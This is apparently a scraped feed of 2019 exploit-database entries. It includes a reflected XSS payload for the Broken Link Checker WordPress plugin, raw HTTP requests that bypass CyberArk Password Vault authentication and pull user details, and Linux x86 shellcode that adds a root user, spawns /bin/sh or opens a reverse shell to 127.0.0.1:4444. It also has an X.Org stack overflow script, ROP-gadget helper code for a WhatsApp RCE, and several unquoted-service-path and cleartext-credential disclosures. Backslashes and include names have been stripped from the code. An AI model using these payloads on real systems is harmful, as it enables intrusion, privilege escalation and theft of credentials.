WordPress Broken Link Check plugin version 1.11.8 suffers from a cross site scripting vulnerability.

MD5 | f4e5f99e5386047d6bb5b0fef5bf7606

Document Title
===============
Reflected XSS via `Broken Link Checker` v.1.11.8 WordPress plugin.

Product Description
===============
Broken Link Checker will monitor your blog looking for broken links and let
you know if any are found.

Homepage: https://managewp.com/
WordPress Plugin: https://wordpress.org/plugins/broken-link-checker/

PoC
===============

1) Login to your wordpress webpage
2) Navigate to the following page (Make sure the `s_link_text` parameter
returns a valid link on your blog:

http://localhost:8889/wp-admin/tools.php?page=view-broken-links&filter_id=search&s_link_text=word&s_link_url&s_http_code&s_filter=%27%3E%22%3E%3Cimg%20src%3D1%20onerror%3Dalert(1337)%3E&s_link_type&search_button=Search+Links

3) Note the form alerts and the payload within the `s_filter` parameter
executed.


CVE-2019-17207


Source

Mikogo version 5.2.2.150317 suffers from a Mikogo-Service unquoted service path vulnerability.

MD5 | de8b28e0f5ac6ad4e7e9250e3f9ca9b1

# Exploit Title : Mikogo 5.2.2.150317 - 'Mikogo-Service' Unquoted Serive Path
# Date : 2019-10-15
# Exploit Author : Cakes
# Vendor: LiteManager Team
# Version : LiteManager 4.5.0
# Software: http://html.tucows.com/preview/518015/Mikogo?q=remote+support
# Tested on Windows 10
# CVE : N/A


c:>sc qc Mikogo-Service
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Mikogo-Service
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:UsersAdministratorAppDataRoamingMikogoMikogo-Service.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Mikogo-Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

Source

Tomedo Server version 1.7.3 suffers from using weak cryptography for passwords and cleartext transmission of sensitive information vulnerabilities.

MD5 | 07f8e3571fab4054ca321d2f70a6bd2c

Affected software: Tomedo Server 1.7.3
Vulnerability type: Cleartext Transmission of Sensitive Information & Weak Cryptography for Passwords
Vulnerable version: Tomedo Server 1.7.3
Vulnerable component: Customer Tomedo Server that communicates with Vendor Tomedo Update Server
Vendor report confidence: Confirmed
Fixed version: Version later then 1.7.3
Vendor notification: 20/09/19
Solution date: 25/09/19
CVE reference: CVE-2019-17393
CVSS Score: 3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Credits: Chris Hein, ProSec GmbH
Communication Timeline:
20th September 2019 Initial contact - no response
25th September second contact attempt
28th September Vendor responded and released an update
14th October fulldisclosure

Vulnerability Details:
The Customer’s Tomedo Server in Version 1.7.3 communicates to the Vendor Tomedo Server via HTTP (in cleartext) that can be sniffed by unauthorized actors.
Basic authentication is used for the authentication what’s makes it possible to base64 decode the sniffed credentials and get hold of the username and password.

Proof of concept:
Capture the traffic between the Tomedo servers via a proxy or a MITM attack and base64 decode the credentials from the HTTP GET request.

Source

CyberArk Password Vault version 10.6 suffers from an authentication bypass vulnerability.

MD5 | 6f4ab2aeece4f1688f2c9f812d93dc07

# Exploit Title: CyberArk Password Vault 10.6 - Authentication Bypass
# Date: 2019-10-16
# Author: Daniel Martinez Adan (adon90)
# Vendor: https://www.cyberark.com
# Software: https://www.cyberark.com/products/privileged-account-security-solution/enterprise-password-vault/
# Collaborator: Luis Buendía (exoticpayloads)
# Version Affected: All

# It is possible to retrieve a valid cookie by injecting special characters
# in the username field:

vulnerable parameter:
pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3AtxtUsername

URL:
/PasswordVault/logon.aspx?ReturnUrl=%2fPasswordVault%2fdefault.aspx

Payload:
%1F

# Requirements:
# Using a valid ViewState -> if it doesn't work, go to the login panel to
# automatically generate a valid ViewState


# Once the valid cookie is obtained, it is posible to perform multiple
# actions in the PasswordVault such us:
# - Retrieving valid user information (Name, Email, Phone number….)
# - DoS
# - DNS enumeration via ip address
# - Possibly deleting users


# Login Bypass:

POST /PasswordVault/logon.aspx?ReturnUrl=%2fPasswordVault%2fdefault.aspx HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://TARGET/PasswordVault/logon.aspx?ReturnUrl=%2fPasswordVault%2fdefault.aspx
Content-Type: application/x-www-form-urlencoded
Content-Length: 2435
Connection: close
Cookie: CA22222=; CA11111=; CA55555=; CA33333=; mobileState=Desktop; __cfduid=d1813e86e4633e4e19945e449038e4f7d1571219978; ASP.NET_SessionId=svcespyi2rswvxcj1wn100ca
Upgrade-Insecure-Requests: 1
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=gjUPDVmn3eCu84zX77GBo4yZO5ypQSyENJ%2FiPcWTNRTh9MtlLoZ6wvk6nCnoK8MeZfh%2BUA9fqjr80wBpvTA04Xkq8mnhgITyUkAx8PuG09vlGK7CBUxV4PHxPooSWtC%2F2RccxoRIuCucsVDXD27UTCiS4VmDoUWDORoecURYhzV2PH7pXm4XGNtNxeI%2FuLXPvwVYAOYkyUZZloZALalGC54rL24Iery7YR0uYvaC61OmxhCtYVy8zHlu7p2fK%2FUHxGxw3oMKrVJA%2BTCT1%2B5AoO4apN7uA%2BBmJzFhcl9vPrdlgCdu%2F1Ei%2F1O0oVn6BOd%2BhFDHdDbpKAX6xIJAWRfb9%2BGG8qobGKR%2B8Fvhao9hx3oCieBe7BvJL%2Fe9Y61tLtvnoLBHwc7uvG4V1lg5oNcQQeEZTGosZ3xrt3dR3kZe2b6vY0QG8YVlJCv56Xb1Ylr7mI7FIbUbKxbZvIkIPrPlKTvkzUTYGXsBOVXNy9KyAhI2%2B9DVkTFFhp%2FK4uWMCMxVq%2FgRxiEyukUbWvobQxSnUH4aNntJiD0Nmlc6UzwNxfvo%2FUNJx8i0yoPoi4PMomsQTE6%2FjtAQiO9rrf6syMLp2lLqXzQ7u90BqyUB9%2BOkn2C2AKZcir2KyT4vGcVOgEfUiZ7twd%2B4uq4acPpQBNto3zBCtgtKzW5iv8TfSCRuigtaT7Oz5qZvWq7UX%2Bqye9cugocb%2BUbaWVXJqcy0Gkdm0BPrRpiCbkSYqfx%2Fo7fYuDjEnMhXrOwBCUOfHhAcjXHZeeJY%2FKsnRP0Aa2%2BNzCOPimbvVEIq0CzTonYV6WFh1a0aDc0m8Qgchz9RnYR67efSftSQYpPzsBIdp0MsFuZ5AmSPROHH37N0zWVV%2BlVvPfwuSlLFV8d5Kq41KJtucYwenrZMq7lhKcDvaRZz5LOFR71DdrYwZoPloK4BK3yl8w8GaOnyRSQsQ0yW4xj5RbJLKN5J54I2fXDkgIVMJY6dbsztZ2JO%2BTpa5xPjJCIjXTR%2B4pJTqCBWc%2FLJ0xzz6x2EOOP9eMY8RH3GaEdg8Lww66zOzpIyXiOBT0VqyRTDxVd2UnEwJZDqwmcHh1n1nN%2BAQoWk2aJDBev9WiGLSx2GxtipLElZsWTcG5txklqFKB7b5mG2jIsx4%2B%2BRlAz2q6b8YJxKem1FnJwQhTyWZ5%2BgEnEGYIylH%2FsYP2eOcBJr5J7gamu%2FsqF9fZa4AJHxEx%2BspDmzm607z8H2AqOhWRemllMT87KVlCuTKiWw3gj7bhj19KtaE1AwmHid5ISXbt%2F5Gcw4LDvDkmfR1akym0jPGdECSyJG0qbhKiE3abdXESlMCURfX6g1W%2B9i8WZJ4hDtHcsPudD6yhp32NSDa2eVqw%3D%3D&__VIEWSTATEGENERATOR=4EAA75BD&__VIEWSTATEENCRYPTED=&__EVENTVALIDATION=yRuqYr%2BEabjm0oMhAb6WmehsX2QOYJhKOP0z9IJq8R2B9Md%2Fi17pZwRXSuLkNN72eNRdEnD%2Fcjr3L3KJLehz7ol6U%2BUONvRqU3dO66PrJIvFj%2BDji4%2FvZeOpLeaI0nY9mSU7%2FdBiOgLzdPnDtNu9G%2BwlR4Z8FdWPayd8UDMqShb%2FmObsqqsoxooNVf8jUFa1X98oKyPHztYNS6ip8fIBl4ksqvsPQhZnc%2Fj%2FniKwWp2GZ%2FmnEhIYMxVVx5tirrB16M4dJqa5ROmxuL%2FJcnW0hqFlAkAycTdep5r0nvN1kXXrIco4RhE52ZbP9yKpr5%2FOyVASLr42dCgOSKXcgkFL1A%3D%3D&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3AtxtUsername=%1F&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3AtxtPassword=&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3AbtnLogon=Sign+in&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3ANewPassword2Hidden=&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3APasswordHidden=admin&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3ANewPassword1Hidden=&AuthModuleUsed=radius&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3ASkipChangePwd=


# User Information:

POST /PasswordVault/services/PrivilegedAccountAccess.asmx/GetUserDetails HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://TARGET/PasswordVault/logon.aspx?ReturnUrl=%2fPasswordVault%2fdefault.aspx
Connection: close
Cookie: CA22222=; CA11111=; CA55555=; CA33333=; mobileState=Desktop; __cfduid=d1813e86e4633e4e19945e449038e4f7d1571219978; ASP.NET_SessionId=svcespyi2rswvxcj1wn100ca;6a5a355a-0547-40ce-9770-fc22d1f3bbea=F538D6D97C6816BC6B22F3685B502B7F0ADA08D2D672995205A3C9E00DAA41E2B679ABAEF1FFD6E6F6DB48F3BA71DA768CA995110FA093634502838D8B4C9533851442A9EE06A041FB7631E2630CDE9F79590C6FDF4E67702F70144FBBD75C75D03B5F70A50EA7F31DFFAB6A81923EF27423A9A419A72E956A76C70E5667A2B1617201BD9168B6CD125EADA08D5B81F77C3224287849EFF258172CC2D51CDF1A9C064BB9F7E4C2450ACE8954B74DE109
Upgrade-Insecure-Requests: 1
Content-Type: application/json
Content-Length: 28
{"userName":"administrator"}


# Resolve DNS / DoS

GET /PasswordVault/ResolveMachineAddress.aspx?data=&moreinfo=127.0.0.1 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
CAAjax: adon90
Referer: https://TARGET/PasswordVault/logon.aspx?ReturnUrl=%2fPasswordVault%2fdefault.aspx
Connection: close
Cookie: CA22222=; CA11111=; CA55555=; CA33333=; mobileState=Desktop; __cfduid=d1813e86e4633e4e19945e449038e4f7d1571219978; ASP.NET_SessionId=svcespyi2rswvxcj1wn100ca;6a5a355a-0547-40ce-9770-fc22d1f3bbea=F538D6D97C6816BC6B22F3685B502B7F0ADA08D2D672995205A3C9E00DAA41E2B679ABAEF1FFD6E6F6DB48F3BA71DA768CA995110FA093634502838D8B4C9533851442A9EE06A041FB7631E2630CDE9F79590C6FDF4E67702F70144FBBD75C75D03B5F70A50EA7F31DFFAB6A81923EF27423A9A419A72E956A76C70E5667A2B1617201BD9168B6CD125EADA08D5B81F77C3224287849EFF258172CC2D51CDF1A9C064BB9F7E4C2450ACE8954B74DE109
Upgrade-Insecure-Requests: 1

Source

74 bytes small add user User to /etc/passwd shellcode.

MD5 | a35a72ae0f7c7e33a07fbb8cac9f46fa

# Exploit Title: Linux/x86 - adduser 'User' to /etc/passwd ShellCode (74 bytes)
# Date: 2019-10-12
# Author: bolonobolo
# Vendor Homepage: None
# Software Link: None
# Tested on: Linux x86
# Comments: add user "User" to /etc/passwd
# CVE: N/A

/*
00000000 31DB xor ebx,ebx
00000002 31C9 xor ecx,ecx
00000004 66B90104 mov cx,0x401
00000008 F7E3 mul ebx
0000000A 53 push ebx
0000000B 6873737764 push dword 0x64777373
00000010 68632F7061 push dword 0x61702f63
00000015 682F2F6574 push dword 0x74652f2f
0000001A 8D1C24 lea ebx,[esp]
0000001D B005 mov al,0x5
0000001F CD80 int 0x80
00000021 93 xchg eax,ebx
00000022 F7E2 mul edx
00000024 686E2F7368 push dword 0x68732f6e
00000029 683A2F6269 push dword 0x69622f3a
0000002E 68303A3A2F push dword 0x2f3a3a30
00000033 683A3A303A push dword 0x3a303a3a
00000038 6855736572 push dword 0x72657355
0000003D 8D0C24 lea ecx,[esp]
00000040 B214 mov dl,0x14
00000042 B004 mov al,0x4
00000044 CD80 int 0x80
00000046 2C13 sub al,0x13
00000048 CD80 int 0x80



*/

#include
#include

unsigned char code[] =
"x31xdbx31xc9x66xb9x01x04xf7xe3x53"
"x68x73x73x77x64x68x63x2fx70x61x68"
"x2fx2fx65x74x8dx1cx24xb0x05xcdx80"
"x93xf7xe2x68x6ex2fx73x68x68x3ax2f"
"x62x69x68x30x3ax3ax2fx68x3ax3ax30"
"x3ax68x55x73x65x72x8dx0cx24xb2x14"
"xb0x04xcdx80x2cx13xcdx80";

void main()
{

printf("Shellcode Length: %dn", strlen(code));

int (*ret)() = (int(*)())code;

ret();

}

Source

25 bytes small Linux/x86 execve /bin/sh shellcode.

MD5 | d46a38b1d7ac05f490e35a9a1e3203e4

# Exploit Title: Linux/x86 - execve /bin/sh ShellCode (25 bytes)
# Date: 2019-10-14
# Author: bolonobolo
# Vendor Homepage: None
# Software Link: None
# Tested on: Linux x86
# CVE: N/A

/*
global _start

section .text
_start:


cdq ; xor edx
mul edx
lea ecx, [eax]
mov esi, 0x68732f2f
mov edi, 0x6e69622f
push ecx ; push NULL in stack
push esi
push edi ; push hs/nib// in stack
lea ebx, [esp] ; load stack pointer to ebx
mov al, 0xb ; load execve in eax
int 0x80 ; execute

*/

#include
#include

unsigned char code[] =
"x99xf7xe2x8dx08xbex2fx2fx73x68xbfx2fx62x69x6ex51x56x57x8dx1cx24xb0x0bxcdx80";

void main()
{

printf("Shellcode Length: %dn", strlen(code));

int (*ret)() = (int(*)())code;

ret();

}

Source

91 bytes small Linux/x86 reverse shell NULL free 127.0.0.1:4444 shellcode.

MD5 | 3db8a3b1f503151d8569756ef3829a15

# Exploit Title: Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes)
# Date: 2019-10-16
# Author: bolonobolo
# Tested on: Linux x86
# Software: N/A
# CVE: N/A

/*
global _start

section .text
_start:


;socket()
xor ecx, ecx ; xoring ECX
xor ebx, ebx ; xoring EBX
mul ebx ; xoring EAX and EDX
inc cl ; ECX should be 1
inc bl
inc bl ; EBX should be 2
mov ax, 0x167 ;
int 0x80 ; call socket()

;connect() ; move the return value of socket
xchg ebx, eax ; from EAX to EBX ready for the next syscalls

; push sockaddr structure in the stack
dec cl
push ecx ; unused char (0)

; move the lenght (16 bytes) of IP in EDX
mov dl, 0x16

; the ip address 1.0.0.127 could be 4.3.3.130 to avoid NULL bytes
mov ecx, 0x04030382 ; mov ip in ecx
sub ecx, 0x03030303 ; subtract 3.3.3.3 from ip
push ecx ; load the real ip in the stack
push word 0x5c11 ; port 4444
push word 0x02 ; AF_INET family
lea ecx, [esp]
; EBX still contain the value of the
opened socket
mov ax, 0x16a
int 0x80

; dup2()
xor ecx, ecx
mov cl, 0x3

dup2:
xor eax, eax
; EBX still contain the value of the
opened socket
mov al, 0x3f
dec cl
int 0x80
jnz dup2

; execve() from the previous polymorphic analysis 25 bytes
cdq ; xor edx
mul edx ; xor eax
lea ecx, [eax] ; xor ecx
mov esi, 0x68732f2f
mov edi, 0x6e69622f
push ecx ; push NULL in stack
push esi ; push hs/ in stack
push edi ; push nib// in stack
lea ebx, [esp] ; load stack pointer to ebx
mov al, 0xb ; load execve in eax
int 0x80
*/

#include
#include

unsigned char code[] =
"x31xc9x31xdbxf7xe3xfexc1xfexc3xfexc3x66xb8x67x01xcdx80x93xfexc9x51xb2x16xb9x82x03x03x04x81xe9x03x03x03x03x51x66x68x11x5cx66x6ax02x8dx0cx24x66xb8x6ax01xcdx80x31xc9xb1x03x31xc0xb0x3fxfexc9xcdx80x75xf6x99xf7xe2x8dx08xbex2fx2fx73x68xbfx2fx62x69x6ex51x56x57x8dx1cx24xb0x0bxcdx80";

void main()
{

printf("Shellcode Length: %dn", strlen(code));

int (*ret)() = (int(*)())code;

ret();

}

Source

X.Org X Server version 1.20.4 suffers from a local stack overflow vulnerability.

MD5 | 564ac3d1c52679d7e251c911238be5a0

# Exploit Title: X.Org X Server 1.20.4 - Local Stack Overflow
# Date: 2019-10-16
# Exploit Author: Marcelo Vázquez (aka s4vitar)
# Vendor Homepage: https://www.x.org/
# Version: <= 1.20.4
# Tested on: Linux
# CVE: CVE-2019-17624

#!/usr/bin/python
#coding: utf-8

# ************************************************************************
# * Author: Marcelo Vázquez (aka s4vitar) *
# * X.Org X Server 1.20.4 / X Protocol Version 11 (Stack Overflow) *
# ************************************************************************

import sys, time
import ctypes as ct

from ctypes import cast
from ctypes.util import find_library

def access_violation(x11, current_display):
keyboard = (ct.c_char * 1000)()
x11.XQueryKeymap(current_display, keyboard)

if __name__ == '__main__':

print "n[*] Loading x11...n"
time.sleep(2)

x11 = ct.cdll.LoadLibrary(find_library("X11"))
current_display = x11.XOpenDisplay(None)

print "[*] Exploiting...n"
time.sleep(1)

try:
access_violation(x11, current_display)

except:
print "nError...n"
sys.exit(1)

Source

Whatsapp version 2.19.216 suffers from a remote code execution vulnerability.

MD5 | bb8020ea612d6105eb21db5cad4eec5d

# Exploit Title: Whatsapp 2.19.216 - Remote Code Execution
# Date: 2019-10-16
# Exploit Author: Valerio Brussani (@val_brux)
# Vendor Homepage: https://www.whatsapp.com/
# Version: < 2.19.244
# Tested on: Whatsapp 2.19.216
# CVE: CVE-2019-11932
# Reference1: https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/
# Full Android App: https://github.com/valbrux/CVE-2019-11932-SupportApp
# Credits: all credits for the bug discovery goes to Awakened (https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/)

/*
*
* Introduction
* This native code file aims to be complementary to the published Whatsapp GIF RCE exploit by Awakened , by calculating the system() function address and ROP gadget address for different types of devices, which then can be used to successfully exploit the vulnerability.
* The full Android application code is available at the following link https://github.com/valbrux/CVE-2019-11932-SupportApp
*
*/

#include
#include
#include
#include

typedef uint8_t byte;
char *gadget_p;
void* libc,* lib;

//dls iteration for rop
int dl_callback(struct dl_phdr_info *info, size_t size, void *data)
{
int j;
const char *base = (const char *)info->dlpi_addr;
for (j = 0; j dlpi_phnum; j++) {
const ElfW(Phdr) *phdr = &info->dlpi_phdr[j];
if (phdr->p_type == PT_LOAD && (strcmp("/system/lib64/libhwui.so",info->dlpi_name) == 0)) {
gadget_p = (char *) base + phdr->p_vaddr;
return 1;
}
}
return 0;
}

//system address
void* get_system_address(){
libc = dlopen("libc.so",RTLD_GLOBAL);
void* address = dlsym( libc, "system");
return address;
}

//rop gadget address
void get_gadget_lib_base_address() {
lib = dlopen("libhwui.so",RTLD_GLOBAL);
dl_iterate_phdr(dl_callback, NULL);
}

//search gadget
long search_for_gadget_offset() {
char *buffer;
long filelen;
char curChar;
long pos = 0; int curSearch = 0;
//reading file
FILE* fd = fopen("/system/lib64/libhwui.so","rb");
fseek(fd, 0, SEEK_END);
filelen = ftell(fd);
rewind(fd);
buffer = (char *)malloc((filelen+1)*sizeof(char));
fread(buffer, filelen, 1, fd);
fclose(fd);
//searching for bytes
byte g1[12] = {0x68, 0x0E, 0x40, 0xF9, 0x60, 0x82, 0x00, 0x91, 0x00, 0x01, 0x3F, 0xD6};
while(pos <= filelen){
curChar = buffer[pos];pos++;
if(curChar == g1[curSearch]){
curSearch++;
if(curSearch > 11){
curSearch = 0;
pos-=12;
break;
}
}
else{
curSearch = 0;
}
}
return pos;
}

extern "C" JNIEXPORT jstring JNICALL Java_com_valbrux_myapplication_MainActivity_getSystem(JNIEnv* env,jobject) {
char buff[30];
//system address
snprintf(buff, sizeof(buff), "%p", get_system_address());
dlclose(libc);
std::string system_string = buff;
return env->NewStringUTF(system_string.c_str());
}



extern "C" JNIEXPORT jstring JNICALL Java_com_valbrux_myapplication_MainActivity_getROPGadget(JNIEnv* env,jobject) {
char buff[30];
get_gadget_lib_base_address();
//gadget address
snprintf(buff, sizeof(buff), "%p",gadget_p+search_for_gadget_offset());
dlclose(lib);
std::string system_string = buff;
return env->NewStringUTF(system_string.c_str());
}

Source

Lavasoft version 2.3.4.7 suffers from a LavasoftTcpService unquoted service path vulnerability.

MD5 | b158f77706a4c9ca81f62848d7d453fa

# Lavasoft 2.3.4.7 - 'LavasoftTcpService' Unquoted Service Path
# Author: Luis MedinaL
# Date: 2019-10-15
# Vendor Homepage: https://www.adaware.com/
# Software Link : https://www.adaware.com/antivirus
# Version : 2.3.4.7
# Tested on: Microsoft Windows 10 Pro x64 ESP

# Description:
# Lavasoft 2.3.4.7 installs LavasoftTcpService as a service with an unquoted service path

C:UsersLuis ML>sc qc LavasoftTcpService
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: LavasoftTcpService
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:Program Files (x86)LavasoftWeb CompanionTcpService2.3.4.7LavasoftTcpService.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : LavasoftTcpService
DEPENDENCIAS : RPCSS
NOMBRE_INICIO_SERVICIO: LocalSystem

Source